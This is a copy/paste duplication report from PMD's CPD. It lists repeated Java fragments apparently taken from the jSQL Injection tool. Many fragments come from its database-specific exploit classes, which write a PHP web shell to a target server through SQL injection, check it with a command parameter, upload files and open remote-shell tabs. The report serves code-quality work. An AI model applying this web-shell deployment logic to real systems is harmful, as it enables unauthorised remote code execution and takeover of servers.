CPD Results
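The following document contains the results of PMD's CPD (Copy/Paste Detector) 7.7.0. Each table below lists the files and starting lines that share one duplicated fragment, followed by the fragment itself. The fragment text appears to be taken from the first file listed, so other occurrences may differ in identifiers or literals (for example, a fragment containing `ModelYamlDerby` is also reported for ExploitHsqldb.java).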
Duplications
File | Project | Line |
---|---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | model | 58 |
com/jsql/model/accessible/vendor/ExploitHsqldb.java | model | 58 |
nameTable, bodyExploit.replace("'", "''"), nameTable, pathExploit + nameExploit ), ResourceAccess.TBL_CREATE); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { String result = this.injectionModel.getResourceAccess().callCommand( urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD ); if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found"); return StringUtils.EMPTY; } var request = new Request(); request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB); request.setParameters(urlSuccess); this.injectionModel.sendToViews(request); return urlSuccess; }; return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); } public void createUpload(String pathExploit, String urlExploit, File fileToUpload) { String bodyExploit = StringUtil.base64Decode( this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameTable = RandomStringUtils.secure().nextAlphabetic(8); var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php"; this.injectionModel.injectWithoutIndex(String.format( this.modelYaml.getFile().getWrite(), nameTable, nameTable, bodyExploit.replace("'", "''"), |
File | Project | Line |
---|---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | model | 61 |
com/jsql/model/accessible/vendor/ExploitH2.java | model | 64 |
com/jsql/model/accessible/vendor/ExploitHsqldb.java | model | 60 |
), ResourceAccess.TBL_CREATE); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { String result = this.injectionModel.getResourceAccess().callCommand( urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD ); if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found"); return StringUtils.EMPTY; } var request = new Request(); request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB); request.setParameters(urlSuccess); this.injectionModel.sendToViews(request); return urlSuccess; }; return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); } public void createUpload(String pathExploit, String urlExploit, File fileToUpload) { String bodyExploit = StringUtil.base64Decode( this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameTable = RandomStringUtils.secure().nextAlphabetic(8); |
File | Project | Line |
---|---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | model | 93 |
com/jsql/model/accessible/vendor/ExploitHsqldb.java | model | 92 |
nameTable, bodyExploit.replace("'", "''"), nameTable, pathExploit + nameExploit ), ResourceAccess.TBL_CREATE); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { try (InputStream streamToUpload = new FileInputStream(fileToUpload)) { HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload); if (result.body().contains(DataAccess.LEAD +"y")) { LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName()); } else { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName()); } } catch (InterruptedException e) { LOGGER.log(LogLevelUtil.IGNORE, e, e); Thread.currentThread().interrupt(); } catch (IOException | JSqlException e) { throw new JSqlRuntimeException(e); } return urlSuccess; }; this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); } public ModelYamlDerby getModelYaml() { |
File | Project | Line |
---|---|---|
com/jsql/util/bruter/Base16.java | model | 62 |
com/jsql/util/bruter/Base16.java | model | 85 |
private static final byte[] UPPER_CASE_DECODE_TABLE = { // 0 1 2 3 4 5 6 7 8 9 A B C D E F -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, -1, -1, -1, -1, -1, -1, // 30-3f 0-9 -1, 10, 11, 12, 13, 14, 15 // 40-46 A-F |
File | Project | Line |
---|---|---|
com/jsql/model/accessible/vendor/ExploitH2.java | model | 64 |
com/jsql/model/accessible/vendor/ExploitSqlite.java | model | 93 |
), ResourceAccess.TBL_DUMP); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { String result = this.injectionModel.getResourceAccess().callCommand( urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD ); if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found"); return StringUtils.EMPTY; } var request = new Request(); request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB); request.setParameters(urlSuccess); this.injectionModel.sendToViews(request); return urlSuccess; }; return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); } public void createUpload(String pathExploit, String urlExploit, File fileToUpload) { String bodyExploit = StringUtil.base64Decode( this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameTable = RandomStringUtils.secure().nextAlphabetic(8); |
File | Project | Line |
---|---|---|
com/jsql/model/accessible/vendor/ExploitH2.java | model | 102 |
com/jsql/model/accessible/vendor/ExploitSqlite.java | model | 128 |
), ResourceAccess.TBL_DUMP); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { try (InputStream streamToUpload = new FileInputStream(fileToUpload)) { HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload); if (result.body().contains(DataAccess.LEAD +"y")) { LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName()); } else { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName()); } } catch (InterruptedException e) { LOGGER.log(LogLevelUtil.IGNORE, e, e); Thread.currentThread().interrupt(); } catch (IOException | JSqlException e) { throw new JSqlRuntimeException(e); } return urlSuccess; }; this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); } public ModelYamlH2 getModelYaml() { |
File | Project | Line |
---|---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | model | 61 |
com/jsql/model/accessible/vendor/ExploitSqlite.java | model | 93 |
), ResourceAccess.TBL_CREATE); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { String result = this.injectionModel.getResourceAccess().callCommand( urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD ); if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found"); return StringUtils.EMPTY; } var request = new Request(); request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB); request.setParameters(urlSuccess); this.injectionModel.sendToViews(request); return urlSuccess; }; return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); } public void createUpload(String pathExploit, String urlExploit, File fileToUpload) { String bodyExploit = StringUtil.base64Decode( this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameTable = RandomStringUtils.secure().nextAlphabetic(8); |
File | Project | Line |
---|---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | model | 96 |
com/jsql/model/accessible/vendor/ExploitH2.java | model | 102 |
com/jsql/model/accessible/vendor/ExploitHsqldb.java | model | 94 |
com/jsql/model/accessible/vendor/ExploitPostgres.java | model | 420 |
com/jsql/model/accessible/vendor/ExploitSqlite.java | model | 128 |
), ResourceAccess.TBL_CREATE); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { try (InputStream streamToUpload = new FileInputStream(fileToUpload)) { HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload); if (result.body().contains(DataAccess.LEAD +"y")) { LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName()); } else { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName()); } } catch (InterruptedException e) { LOGGER.log(LogLevelUtil.IGNORE, e, e); Thread.currentThread().interrupt(); } catch (IOException | JSqlException e) { throw new JSqlRuntimeException(e); } return urlSuccess; }; this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); } public ModelYamlDerby getModelYaml() { |
File | Project | Line |
---|---|---|
com/jsql/model/accessible/vendor/ExploitPostgres.java | model | 318 |
com/jsql/model/accessible/vendor/ExploitPostgres.java | model | 402 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format( this.modelYaml.getFile().getWrite().getLargeObject().getFromText(), bodyExploit.replace("'", "\"") ), ResourceAccess.ADD_LOID); if (StringUtils.isEmpty(loid)) { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.LOID_NOT_FOUND); return; } var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php"; this.injectionModel.getResourceAccess().getResultWithCatch(String.format( this.modelYaml.getFile().getWrite().getLargeObject().getToFile(), loid, pathExploit + nameExploit ), ResourceAccess.WRITE_LOID); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { |
File | Project | Line |
---|---|---|
com/jsql/model/injection/strategy/blind/InjectionCharInsertion.java | model | 95 |
com/jsql/model/injection/strategy/blind/InjectionVendor.java | model | 71 |
List<Future<CallableCharInsertion>> listTagTrue = taskExecutor.invokeAll(listCallableTagTrue); this.injectionModel.getMediatorUtils().getThreadUtil().shutdown(taskExecutor); for (var i = 1 ; i < listTagTrue.size() ; i++) { if (this.injectionModel.isStoppedByUser()) { return; } if (this.constantTrueMark.isEmpty()) { this.constantTrueMark = listTagTrue.get(i).get().getOpcodes(); } else { this.constantTrueMark.retainAll(listTagTrue.get(i).get().getOpcodes()); } } } catch (ExecutionException e) { LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e); } catch (InterruptedException e) { LOGGER.log(LogLevelUtil.IGNORE, e, e); Thread.currentThread().interrupt(); } this.initFalseMarks(); |
File | Project | Line |
---|---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | model | 98 |
com/jsql/model/accessible/vendor/ExploitMysql.java | model | 110 |
com/jsql/model/accessible/vendor/ExploitPostgres.java | model | 422 |
com/jsql/model/accessible/vendor/ExploitSqlite.java | model | 130 |
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { try (InputStream streamToUpload = new FileInputStream(fileToUpload)) { HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload); if (result.body().contains(DataAccess.LEAD +"y")) { LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName()); } else { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName()); } } catch (InterruptedException e) { LOGGER.log(LogLevelUtil.IGNORE, e, e); Thread.currentThread().interrupt(); } catch (IOException | JSqlException e) { throw new JSqlRuntimeException(e); } return urlSuccess; }; this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); |
File | Project | Line |
---|---|---|
com/jsql/model/accessible/vendor/ExploitH2.java | model | 104 |
com/jsql/model/accessible/vendor/ExploitMysql.java | model | 110 |
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { try (InputStream streamToUpload = new FileInputStream(fileToUpload)) { HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload); if (result.body().contains(DataAccess.LEAD +"y")) { LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName()); } else { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName()); } } catch (InterruptedException e) { LOGGER.log(LogLevelUtil.IGNORE, e, e); Thread.currentThread().interrupt(); } catch (IOException | JSqlException e) { throw new JSqlRuntimeException(e); } return urlSuccess; }; this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); |
File | Project | Line |
---|---|---|
com/jsql/model/accessible/vendor/ExploitHsqldb.java | model | 96 |
com/jsql/model/accessible/vendor/ExploitMysql.java | model | 110 |
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { try (InputStream streamToUpload = new FileInputStream(fileToUpload)) { HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload); if (result.body().contains(DataAccess.LEAD +"y")) { LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName()); } else { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName()); } } catch (InterruptedException e) { LOGGER.log(LogLevelUtil.IGNORE, e, e); Thread.currentThread().interrupt(); } catch (IOException | JSqlException e) { throw new JSqlRuntimeException(e); } return urlSuccess; }; this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); |
File | Project | Line |
---|---|---|
com/jsql/view/terminal/interaction/MessageHeader.java | model | 33 |
com/jsql/view/swing/interaction/MessageHeader.java | view | 44 |
@SuppressWarnings("unchecked") public MessageHeader(Object[] interactionParams) { Map<Header, Object> params = (Map<Header, Object>) interactionParams[0]; this.url = (String) params.getOrDefault(Header.URL, StringUtils.EMPTY); this.post = (String) params.getOrDefault(Header.POST, StringUtils.EMPTY); this.header = (Map<String, String>) params.getOrDefault(Header.HEADER, Collections.emptyMap()); this.response = (Map<String, String>) params.getOrDefault(Header.RESPONSE, Collections.emptyMap()); this.source = (String) params.getOrDefault(Header.SOURCE, StringUtils.EMPTY); |
File | Project | Line |
---|---|---|
com/jsql/util/bruter/Base16.java | model | 64 |
com/jsql/util/bruter/Base16.java | model | 87 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f |
File | Project | Line |
---|---|---|
com/jsql/model/accessible/vendor/ExploitH2.java | model | 48 |
com/jsql/model/accessible/vendor/ExploitH2.java | model | 86 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameTable = RandomStringUtils.secure().nextAlphabetic(8); this.injectionModel.injectWithoutIndex(String.format( this.modelYaml.getRce().getCreateTable(), nameTable, nameTable, bodyExploit.replace("'", "\"") ), ResourceAccess.TBL_CREATE); var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php"; this.injectionModel.injectWithoutIndex(String.format( this.modelYaml.getRce().getScriptSimple(), pathExploit + nameExploit, nameTable ), ResourceAccess.TBL_DUMP); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { |
File | Project | Line |
---|---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | model | 40 |
com/jsql/model/accessible/vendor/ExploitHsqldb.java | model | 40 |
ModelYamlDerby.class ); } public String createWeb(String pathExploit, String urlExploit) { LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine, jdbc bridge"); String bodyExploit = StringUtil.base64Decode( this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameTable = RandomStringUtils.secure().nextAlphabetic(8); var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php"; this.injectionModel.injectWithoutIndex(String.format( this.modelYaml.getFile().getWrite(), nameTable, nameTable, bodyExploit.replace("'", "''"), |
File | Project | Line |
---|---|---|
com/jsql/model/injection/strategy/blind/InjectionCharInsertion.java | model | 173 |
com/jsql/model/injection/strategy/blind/InjectionVendor.java | model | 142 |
); try { blindTest.call(); } catch (Exception e) { LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e); } return blindTest.isTrue() && !this.constantTrueMark.isEmpty(); } public String callUrl(String urlString, String metadataInjectionProcess) { return this.injectionModel.injectWithoutIndex(urlString, metadataInjectionProcess); } public String callUrl(String urlString, String metadataInjectionProcess, AbstractCallableBinary<?> callableBoolean) { return this.injectionModel.injectWithoutIndex(urlString, metadataInjectionProcess, callableBoolean); } // Getter public String getBlankFalseMark() { return this.blankFalseMark; } public List<Diff> getConstantTrueMark() { return this.constantTrueMark; } } |
File | Project | Line |
---|---|---|
com/jsql/util/bruter/Base16.java | model | 64 |
com/jsql/util/bruter/Base16.java | model | 90 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f |
File | Project | Line |
---|---|---|
com/jsql/util/bruter/Base16.java | model | 87 |
com/jsql/util/bruter/Base16.java | model | 90 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f |
File | Project | Line |
---|---|---|
com/jsql/util/bruter/Base16.java | model | 64 |
com/jsql/util/bruter/Base16.java | model | 90 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f |
File | Project | Line |
---|---|---|
com/jsql/util/bruter/Base16.java | model | 87 |
com/jsql/util/bruter/Base16.java | model | 90 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f |
File | Project | Line |
---|---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | model | 48 |
com/jsql/model/accessible/vendor/ExploitDerby.java | model | 83 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameTable = RandomStringUtils.secure().nextAlphabetic(8); var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php"; this.injectionModel.injectWithoutIndex(String.format( this.modelYaml.getFile().getWrite(), nameTable, nameTable, bodyExploit.replace("'", "''"), nameTable, pathExploit + nameExploit ), ResourceAccess.TBL_CREATE); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { |
File | Project | Line |
---|---|---|
com/jsql/model/accessible/vendor/ExploitHsqldb.java | model | 48 |
com/jsql/model/accessible/vendor/ExploitHsqldb.java | model | 82 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameTable = RandomStringUtils.secure().nextAlphabetic(8); var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php"; this.injectionModel.injectWithoutIndex(String.format( this.modelYaml.getFile().getWrite(), nameTable, nameTable, bodyExploit.replace("'", "\""), nameTable, pathExploit + nameExploit ), ResourceAccess.TBL_CREATE); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { |
File | Project | Line |
---|---|---|
com/jsql/model/accessible/vendor/ExploitSqlite.java | model | 81 |
com/jsql/model/accessible/vendor/ExploitSqlite.java | model | 116 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty("exploit.web") ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameDbRandom = RandomStringUtils.secure().nextAlphabetic(8); var nameTableRandom = RandomStringUtils.secure().nextAlphabetic(8); var nameExploit = nameDbRandom + nameTableRandom +".php"; this.injectionModel.injectWithoutIndex(String.format( this.modelYaml.getWriteFile(), pathExploit + nameExploit, nameDbRandom, nameDbRandom, nameTableRandom, nameDbRandom, nameTableRandom, bodyExploit ), ResourceAccess.TBL_DUMP); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { |
File | Project | Line |
---|---|---|
com/jsql/view/swing/tab/TabResults.java | view | 168 |
com/jsql/view/swing/tab/TabResults.java | view | 188 |
com/jsql/view/swing/tab/TabResults.java | view | 208 |
com/jsql/view/swing/tab/TabResults.java | view | 228 |
com/jsql/view/swing/tab/TabResults.java | view | 248 |
var terminal = new ExploitRceOracle(terminalID); MediatorHelper.frame().getMapUuidShell().put(terminalID, terminal); JScrollPane scroller = new JScrollPane(terminal); this.addTab(TabResults.RCE_SHELL, scroller); this.setSelectedComponent(scroller); // Focus on the new tab var header = new TabHeader(TabResults.RCE_SHELL, UiUtil.TERMINAL.getIcon()); this.setTabComponentAt(this.indexOfComponent(scroller), header); terminal.requestFocusInWindow(); this.updateUI(); // required: light, open/close prefs, dark => light artifacts } catch (MalformedURLException | URISyntaxException e) { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, TabResults.TAB_EXPLOIT_FAILURE_INCORRECT_URL, e); } } public void addTabExploitRcePostgres() { |
File | Project | Line |
---|---|---|
com/jsql/model/injection/strategy/StrategyInjectionBlind.java | model | 46 |
com/jsql/model/injection/strategy/StrategyInjectionTime.java | model | 46 |
} else if (StringUtils.isEmpty(this.injectionModel.getMediatorVendor().getVendor().instance().sqlBinaryBlind())) { LOGGER.log( LogLevelUtil.CONSOLE_ERROR, AbstractStrategy.FORMAT_STRATEGY_NOT_IMPLEMENTED, this.getName(), this.injectionModel.getMediatorVendor().getVendor() ); return; } this.checkInjection(BinaryMode.OR); this.checkInjection(BinaryMode.AND); this.checkInjection(BinaryMode.STACK); this.checkInjection(BinaryMode.NO_MODE); if (this.isApplicable) { this.allow(); var requestMessageBinary = new Request(); requestMessageBinary.setMessage(Interaction.MESSAGE_BINARY); requestMessageBinary.setParameters(this.injectionBlind.getInfoMessage()); |
File | Project | Line |
---|---|---|
com/jsql/model/injection/strategy/StrategyInjectionBlind.java | model | 86 |
com/jsql/model/injection/strategy/StrategyInjectionTime.java | model | 85 |
this.isApplicable = this.injectionBlind.isInjectable(); if (this.isApplicable) { LOGGER.log( LogLevelUtil.CONSOLE_SUCCESS, "{} [{}] injection with [{}]", () -> I18nUtil.valueByKey(AbstractStrategy.KEY_LOG_VULNERABLE), this::getName, () -> binaryMode ); } } @Override public void allow(int... i) { this.injectionModel.appendAnalysisReport( StringUtil.formatReport(LogLevelUtil.COLOR_BLU, "### Strategy: " + this.getName()) + this.injectionModel.getReportWithoutIndex( this.injectionModel.getMediatorVendor().getVendor().instance().sqlTestBlind( |